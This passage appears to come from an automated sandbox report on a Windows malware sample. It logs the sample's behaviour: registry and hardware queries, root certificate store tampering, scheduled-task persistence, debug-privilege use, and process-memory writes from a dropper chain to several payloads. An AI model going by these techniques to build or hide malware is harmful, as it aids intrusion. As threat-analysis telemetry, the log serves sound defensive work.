Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\rwhkbvh\apitlt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
N/A N/A C:\ProgramData\rwhkbvh\apitlt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2520 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2520 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2520 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2520 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2716 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 2716 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 2716 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 2716 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 2716 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2716 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2716 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2716 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1740 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Windows\SysWOW64\WerFault.exe
PID 1740 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Windows\SysWOW64\WerFault.exe
PID 1740 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Windows\SysWOW64\WerFault.exe
PID 1740 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Windows\SysWOW64\WerFault.exe
PID 2716 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
